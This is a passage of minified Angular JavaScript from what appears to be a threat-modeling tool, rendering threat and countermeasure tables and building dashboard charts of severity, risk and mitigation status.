new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,AZ,S7]}),t})();Ds(zG,[Zi,Ri,Zh,xp,oa,_u,gu,Od,Hh,da,qh,V1,Mu,Uh,_f,gf,df,w5,Clt,Xlt,gT,TZ,hut,Ypt,IZ,G_t,Z_t,sgt,bgt,Ogt,Bgt,U0t,j0t,h1t],[Xi]),Ds(kG,[Zi,Ri,an,Ta,Ea,oa,Hh,da,nn,un,qh,V1,Mu,Uh,Go,Xa,Pa,b8,M8,vm,Am,Tm,Em,Qp],[Xi]),Ds(lM,[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,oa,br,da,nn,pp,un,jr,Nr,yr,Cg,Go,Xa,es,ts,Or,Lr,rc,Xo,qo,po,Zc,Pa,tl,Ec,Dc,el,Il,Cp,RZ,I5,KT,Qg,EZ,Gp,lM,cM,gM],[Xi]),Ds(cM,[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,oa,da,nn,pp,un,jr,Nr,yr,Cg,Go,Xa,es,ts,Or,Lr,rc,Xo,qo,po,Pa,tl,Ec,Dc,el,Il,Cp,RZ,KT,T2,lM,_T,gM],[Xi]),Ds(_T,[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,oa,da,nn,pp,un,jr,Nr,yr,Go,Xa,Xo,qo,po,Pa,TV,tl,Ec,Dc,el,Il,Cp,Qp,KT,cM],[Xi]),Ds(gM,[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,oa,da,nn,pp,un,jr,Nr,yr,Go,Xa,es,ts,Or,Lr,Xo,qo,po,Zc,Pa,Qp],[Xi]);const y1t=["threattable"],b1t=["countermeasuretable"];function M1t(t,a){1&t&&it(0,"mat-progress-spinner",38),2&t&&V("diameter",25)}function v1t(t,a){if(1&t&&(m(0,"div"),s(1,"\n          "),it(2,"app-results-chart",39),s(3,"\n        "),u()),2&t){const e=a.$implicit;ri("margin-left",a.first?"0":"10px"),C(2),V("diagram",e)}}function A1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function T1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function E1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function D1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function x1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function w1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function I1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.View")," "))}function R1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetViewName(e)," ")}}function S1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Severity")," "))}function k1t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function P1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",42),he("ngModelChange",function(n){return Me(be(e).$implicit.Severity=n)})("change",function(){return be(e),Me(B().UpdateDiagramsDelayed())}),s(3,"\n                    "),m(4,"option",43),s(5),oe(6,"translate"),u(),s(7,"\n                    "),ne(8,k1t,3,4,"option",44),s(9,"\n                  "),u(),s(10,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.Severity),C(2),V("value",0),C(1),ke(re(6,4,"properties.selectNone")),C(3),V("ngForOf",i.GetSeverityTypes())}}function O1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Risk")," "))}function N1t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function L1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",45),he("ngModelChange",function(n){return Me(be(e).$implicit.Risk=n)}),s(3,"\n                    "),ne(4,N1t,3,4,"option",44),s(5,"\n                  "),u(),s(6,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.Risk),C(2),V("ngForOf",i.GetSeverityTypes())}}function z1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function W1t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function F1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",46),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)})("change",function(){return be(e),Me(B().UpdateDiagramsDelayed())}),s(3,"\n                    "),ne(4,W1t,3,4,"option",44),s(5,"\n                  "),u(),s(6,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function V1t(t,a){1&t&&(m(0,"th",47),s(1," "),u())}function B1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1," "),m(2,"mat-icon",48),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function H1t(t,a){1&t&&it(0,"tr",49)}function U1t(t,a){if(1&t){const e=Ye();m(0,"tr",50),he("click",function(){const r=be(e).$implicit;return Me(B().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n              "),u()}if(2&t){const e=a.$implicit;Ct("selected-entry",B().IsThreatSelected(e)),V("id",e.ID)}}function q1t(t,a){if(1&t){const e=Ye();m(0,"tr",51),s(1,"\n                "),m(2,"td",52),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n              "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function G1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function j1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Q1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function $1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function K1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Targets")," "))}function X1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function Y1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.View")," "))}function J1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetViewName(e)," ")}}function Z1t(t,a){1&t&&(m(0,"th",47),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Progress")," "))}function e2t(t,a){1&t&&it(0,"mat-progress-bar",54),2&t&&V("value",B().$implicit.MitigationProcess.Progress)}function t2t(t,a){if(1&t&&(m(0,"td",41),s(1," \n                  "),ne(2,e2t,1,1,"mat-progress-bar",53),s(3,"\n                "),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.MitigationProcess)}}function i2t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function a2t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function n2t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",46),he("ngModelChange",function(n){return Me(be(e).$implicit.MitigationState=n)})("change",function(){return be(e),Me(B().UpdateDiagramsDelayed())}),s(3,"\n                    "),ne(4,a2t,3,4,"option",44),s(5,"\n                  "),u(),s(6,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function o2t(t,a){1&t&&(m(0,"th",47),s(1," "),u())}function r2t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1," "),m(2,"mat-icon",48),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function s2t(t,a){1&t&&it(0,"tr",49)}function c2t(t,a){if(1&t){const e=Ye();m(0,"tr",50),he("click",function(){const r=be(e).$implicit;return Me(B().SelectCountermeasure(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n              "),u()}if(2&t){const e=a.$implicit;Ct("selected-entry",B().IsCountermeasureSelected(e)),V("id",e.ID)}}function l2t(t,a){if(1&t){const e=Ye();m(0,"tr",51),s(1,"\n                "),m(2,"td",52),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n              "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.countermeasuretable.noCountermeasures")))}function d2t(t,a){if(1&t&&(m(0,"span",57),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function m2t(t,a){1&t&&(m(0,"span",57),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function u2t(t,a){if(1&t){const e=Ye();s(0,"\n          "),ne(1,d2t,2,1,"span",55),s(2," \n          "),ne(3,m2t,3,3,"span",55),s(4,"\n          "),m(5,"button",56),he("click",function(){const r=be(e).item;return Me(B().OnMappingDblClick(r))}),s(6,"\n            "),m(7,"mat-icon"),s(8,"preview"),u(),s(9,"\n            "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n          "),u(),s(14,"\n          "),m(15,"button",56),he("click",function(){const r=be(e).item;return Me(B().ResetNumbers(r))}),s(16,"\n            "),m(17,"mat-icon"),s(18,"format_list_numbered"),u(),s(19,"\n            "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n          "),u(),s(24," \n          "),m(25,"button",56),he("click",function(){const r=be(e).item;return Me(B().ResetReorderNumbers(r))}),s(26,"\n            "),m(27,"mat-icon"),s(28,"format_list_numbered"),u(),s(29,"\n            "),m(30,"span"),s(31),oe(32,"translate"),u(),s(33,"\n          "),u(),s(34," \n        ")}if(2&t){const e=a.item;C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,8,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e),C(6),ke(re(22,10,"pages.modeling.threattable.resetNumbers")),C(4),V("disabled",!e),C(6),ke(re(32,12,"pages.modeling.threattable.resetReorderNumbers"))}}var eo=(()=>{return(t=eo||(eo={})).Black="#000000",t.White="#FFFFFF",t.Green="#339900",t.Yellow="#FFCC00",t.Red="#FF2417",t.DarkRed="#8a0f0f",eo;var t})();let yf=(()=>{class t{constructor(e,i,n,r,c,d){this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.elRef=d,this.updateDiagramsDelayCounter=0,this._attackScenarios=[],this._countermeasures=[],this.menuTopLeftPosition={x:"0",y:"0"},this.diagrams=[],this.displayedThreatColumns=["number","name","elements","view","severity","risk","status","more"],this.displayedCountermeasureColumns=["number","name","targets","view","progress","status","more"]}get isUpdatingDiagrams(){return this.updateDiagramsDelayCounter>0}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._attackScenarios=e,this.dataSourceThreats=new Ld(e.filter(r=>![_o.NotApplicable,_o.Duplicate].includes(r.ThreatState))),this.dataSourceThreats.sort=this.sortThreats,this.dataSourceThreats.sortingDataAccessor=(r,c)=>"number"==c?Number(r.Number):"name"==c?r.Name:"elements"==c?this.GetTargets(r):"view"==c?this.GetViewName(r):"severity"==c?r.Severity:"risk"==c?r.Risk:"status"==c?r.ThreatState:void console.error("Missing sorting header",c),this.dataSourceThreats.filterPredicate=(r,c)=>{var d,T;let k=c.trim().toLowerCase(),q=r.Name.toLowerCase().indexOf(k);return-1==q&&(q=null===(d=r.AttackVector)||void 0===d?void 0:d.Name.toLowerCase().indexOf(k)),-1==q&&(q=null===(T=this.GetTargets(r))||void 0===T?void 0:T.toLowerCase().indexOf(k)),null!=q&&-1!=q},this.sortThreats&&this.sortThreats.sortChange.emit(this.sortThreats)}get Countermeasures(){return this._countermeasures}set Countermeasures(e){this._countermeasures=e,this.dataSourceCountermeasures=new Ld(e.filter(r=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(r.MitigationState))),this.dataSourceCountermeasures.sort=this.sortCountermeasures,this.dataSourceCountermeasures.sortingDataAccessor=(r,c)=>"number"==c?Number(r.Number):"name"==c?r.Name:"targets"==c?this.GetTargets(r):"view"==c?this.GetViewName(r):"status"==c?r.MitigationState:void console.error("Missing sorting header",c),this.dataSourceCountermeasures.filterPredicate=(r,c)=>{var d,T;let k=c.trim().toLowerCase(),q=r.Name.toLowerCase().indexOf(k);return-1==q&&(q=null===(d=r.Control)||void 0===d?void 0:d.Name.toLowerCase().indexOf(k)),-1==q&&(q=null===(T=this.GetTargets(r))||void 0===T?void 0:T.toLowerCase().indexOf(k)),null!=q&&-1!=q},this.sortCountermeasures&&this.sortCountermeasures.sortChange.emit(this.sortCountermeasures)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}ngAfterViewInit(){let e=()=>{setTimeout(()=>{this.AttackScenarios=this.dataService.Project.GetAttackScenariosApplicable().filter(i=>i.MappingState!=zn.Removed),this.Countermeasures=this.dataService.Project.GetCountermeasuresApplicable().filter(i=>i.MappingState!=zn.Removed),this.UpdateDiagrams()},10)};this.dataService.Project?e():this.dataService.ProjectChanged.subscribe(i=>e()),this.theme.ThemeChanged.subscribe(i=>{setTimeout(()=>{this.UpdateDiagrams()},100)})}onKeyDown(e){var i;if("TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedObject){const n=(r,c)=>{this.selectedObject=r[c];const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){let r=[];r=this.selectedObject instanceof Rc?this.dataSourceThreats.sortData(this.dataSourceThreats.filteredData,this.sortThreats):this.dataSourceCountermeasures.sortData(this.dataSourceCountermeasures.filteredData,this.sortCountermeasures);const c=r.indexOf(this.selectedObject);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){let r=[];r=this.selectedObject instanceof Rc?this.dataSourceThreats.sortData(this.dataSourceThreats.filteredData,this.sortThreats):this.dataSourceCountermeasures.sortData(this.dataSourceCountermeasures.filteredData,this.sortCountermeasures);const c=r.indexOf(this.selectedObject);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}UpdateDiagrams(){if(!this.dataService.Project)return;let e=(window.innerHeight-24)*this.GetSplitSize(1,0,50)/100;e=e-36-17-20-33-60;let i=(document.getElementById("diagramContainer").clientWidth-20-30)/4,n=t.CreateSeveritySummaryDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),r=t.CreateCountermeasureSummaryDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),c=t.CreateSeverityPerLifecycleDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),d=t.CreateSeverityPerTypeDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),T=t.CreateRiskSummaryDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),k=t.CreateSeverityPerImpactCatDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),q=[];this.dataService.Project.GetMyTagCharts().forEach(Y=>{q.push(t.CreateTagDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e,Y))}),this.diagrams=[...q,n,T,r,d,c,k]}UpdateDiagramsDelayed(){this.updateDiagramsDelayCounter++,setTimeout(()=>{this.updateDiagramsDelayCounter--,0==this.updateDiagramsDelayCounter&&this.UpdateDiagrams()},3e3)}static CreateTagDiagram(e,i,n,r,c,d){let T=[];d.MyTags.forEach(Re=>{let Fe;Fe=d.Type==id.Severity?(Re=>{let Fe=[];return Fe.push({name:i.instant("properties.threatstate.NotSet"),value:Re.filter(Ne=>!vn.GetTypesDashboard().includes(Ne.Severity)).length}),vn.GetTypesDashboard().forEach(Ne=>{Fe.push({name:i.instant(vn.ToString(Ne)),value:Re.filter(et=>et.Severity==Ne).length})}),Fe})(e.GetAttackScenariosApplicable().filter(et=>et.MyTags.includes(Re))):d.Type==id.Risk?(Re=>{let Fe=[];return Fe.push({name:i.instant("properties.threatstate.NotSet"),value:Re.filter(Ne=>null==Ne.Risk).length}),vn.GetTypesDashboard().forEach(Ne=>{Fe.push({name:i.instant(vn.ToString(Ne)),value:Re.filter(et=>et.Risk==Ne).length})}),Fe})(e.GetAttackScenariosApplicable().filter(et=>et.MyTags.includes(Re))):(Re=>{let Fe=[];return al.GetMitigationStates().filter(Ne=>Ne!=Ra.NotApplicable).forEach(Ne=>{Fe.push({name:i.instant(al.ToString(Ne)),value:Re.filter(et=>et.MitigationState==Ne).length})}),Fe})(e.GetCountermeasuresApplicable().filter(et=>et.MyTags.includes(Re)));let Ne={name:Re.GetProperty("Name"),series:Fe};T.push(Ne)}),T=T.filter(Re=>!Re.series.every(Fe=>0==Fe.value));let te=[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed];return d.Type==id.Countermeasure&&(te=[eo.DarkRed,t.getNeutral(n),eo.Red,eo.Yellow,eo.Green]),{results:T,view:[r,c],scheme:{domain:te},xAxisLabel:d.Name,yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateSeveritySummaryDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>!vn.GetTypesDashboard().includes(pe.Severity)).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Severity==pe).length})}),te};if(e.GetDevices().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetMobileApps().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetDFDiagrams().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(e.GetAttackScenariosApplicable().filter(pe=>pe.ViewID==Y.ID))};d.push(te)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SeverityOverview"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateRiskSummaryDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>null==pe.Risk).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Risk==pe).length})}),te};if(e.GetDevices().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetMobileApps().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetDFDiagrams().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(e.GetAttackScenariosApplicable().filter(pe=>pe.ViewID==Y.ID))};d.push(te)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.RiskOverview"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateCountermeasureSummaryDiagram(e,i,n,r,c){let d=[],T=e.GetCountermeasuresApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),al.GetDashboardMitigationStates().forEach(pe=>{te.push({name:i.instant(al.ToString(pe)),value:Y.filter(Re=>Re.MitigationState==pe).length})}),te};if(e.GetDevices().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetCountermeasuresApplicable())};d.push(te)}),e.GetMobileApps().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetCountermeasuresApplicable())};d.push(te)}),e.GetDFDiagrams().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(e.GetCountermeasuresApplicable().filter(pe=>pe.ViewID==Y.ID))};d.push(te)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[eo.DarkRed,eo.Red,eo.Yellow,eo.Green]},xAxisLabel:i.instant("pages.dashboard.MeasureOverview"),yAxisLabel:i.instant("pages.dashboard.NumberOfCountermeasures")}}static CreateSeverityPerLifecycleDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>!vn.GetTypesDashboard().includes(pe.Severity)).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Severity==pe).length})}),te};if(y2.GetKeys().forEach(Y=>{let te=T.filter(Re=>{var Fe;return null===(Fe=Re.AttackVector)||void 0===Fe?void 0:Fe.ThreatExploited.includes(Y)});T=T.filter(Re=>!te.includes(Re));let pe={name:i.instant(y2.ToString(Y)),series:k(te)};d.push(pe)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SevertiyPerLifecycle"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateSeverityPerTypeDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Ne=>{let et=[];return T=T.filter(ut=>!Ne.includes(ut)),et.push({name:i.instant("properties.threatstate.NotSet"),value:Ne.filter(ut=>!vn.GetTypesDashboard().includes(ut.Severity)).length}),vn.GetTypesDashboard().forEach(ut=>{et.push({name:i.instant(vn.ToString(ut)),value:Ne.filter(Ze=>Ze.Severity==ut).length})}),et},q=e.GetDevices().map(Ne=>Ne.HardwareDiagram).filter(Ne=>Ne).map(Ne=>Ne.ID),Y={name:i.instant("general.Hardware"),series:k(T.filter(Ne=>q.includes(Ne.ViewID)))};d.push(Y);let te=e.GetDevices().map(Ne=>Ne.SoftwareStack).filter(Ne=>Ne).map(Ne=>Ne.ID);te.push(...e.GetMobileApps().map(Ne=>Ne.SoftwareStack).filter(Ne=>Ne).map(Ne=>Ne.ID)),Y={name:i.instant("general.Software"),series:k(T.filter(Ne=>te.includes(Ne.ViewID)))},d.push(Y);let pe=e.GetDevices().map(Ne=>Ne.ProcessStack).filter(Ne=>Ne).map(Ne=>Ne.ID);pe.push(...e.GetMobileApps().map(Ne=>Ne.ProcessStack).filter(Ne=>Ne).map(Ne=>Ne.ID)),Y={name:i.instant("general.Process"),series:k(T.filter(Ne=>pe.includes(Ne.ViewID)))},d.push(Y);let Re=e.GetDFDiagrams().map(Ne=>Ne.ID);if(Y={name:i.instant("general.DataFlow"),series:k(T.filter(Ne=>Re.includes(Ne.ViewID)))},d.push(Y),T.length>0){let Ne={name:i.instant("general.Other"),series:k(T)};d.push(Ne)}return{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SeverityPerType"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateSeverityPerImpactCatDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>!vn.GetTypesDashboard().includes(pe.Severity)).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Severity==pe).length})}),te};return Vs.GetKeys().forEach(Y=>{let te=T.filter(Re=>Re.SystemThreats.some(Fe=>Fe.ImpactCats.includes(Y))),pe={name:i.instant(Vs.ToString(Y)),series:k(te)};d.push(pe)}),d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SeverityPerImpactCategory"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static getNeutral(e){return e?eo.White:eo.Black}OpenTagCharts(){this.dialog.OpenTagChartsDialog().subscribe(()=>{this.UpdateDiagrams()})}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_DASHBOARD_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes)),this.UpdateDiagrams()}OnMappingDblClick(e,i=null){e instanceof Rc?this.dialog.OpenAttackScenarioDialog(e,!1,this.dataSourceThreats.sortData(this.dataSourceThreats.filteredData,this.sortThreats)):e instanceof Jl&&(i&&i.target&&"progress"==this.displayedCountermeasureColumns[i.target.cellIndex]&&e.MitigationProcess?this.dialog.OpenMitigationProcessDialog(e.MitigationProcess,!1):this.dialog.OpenCountermeasureDialog(e,!1,[],this.dataSourceCountermeasures.sortData(this.dataSourceCountermeasures.filteredData,this.sortCountermeasures)))}ApplyThreatFilter(e){this.dataSourceThreats.filter=e.target.value.trim().toLowerCase()}ApplyCountermeasureFilter(e){this.dataSourceCountermeasures.filter=e.target.value.trim().toLowerCase()}IsThreatSelected(e){return this.selectedObject==e}SelectThreat(e){this.selectedObject=e}IsCountermeasureSelected(e){return this.selectedObject==e}SelectCountermeasure(e){this.selectedObject=e}IsElementSelected(e){return e&&this.selectedObject&&this.selectedObject.Targets.some(i=>e.Targets.includes(i))}GetViewName(e){var i,n;let r=null===(i=this.dataService.Project.GetDiagrams().find(c=>c.ID==e.ViewID))||void 0===i?void 0:i.Name;return r||(r=null===(n=this.dataService.Project.GetStacks().find(c=>c.ID==e.ViewID))||void 0===n?void 0:n.Name),r}GetTargets(e){return e.Targets.filter(i=>i).map(i=>i.GetProperty("Name")).join(", ")}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypesDashboard()}GetSeverityTypeName(e){return vn.ToString(e)}GetMitigationStates(){return al.GetMitigationStates()}GetMitigationStateName(e){return al.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}ResetNumbers(e){let i=[];e instanceof Rc?i=[...this.dataService.Project.GetAttackScenariosApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number)),...this.dataService.Project.GetAttackScenariosNotApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number))]:e instanceof Jl&&(i=[...this.dataService.Project.GetCountermeasuresApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number)),...this.dataService.Project.GetCountermeasuresNotApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number))]);for(let n=0;n<i.length;n++)i[n].Number=(n+1).toString()}ResetReorderNumbers(e){if(e instanceof 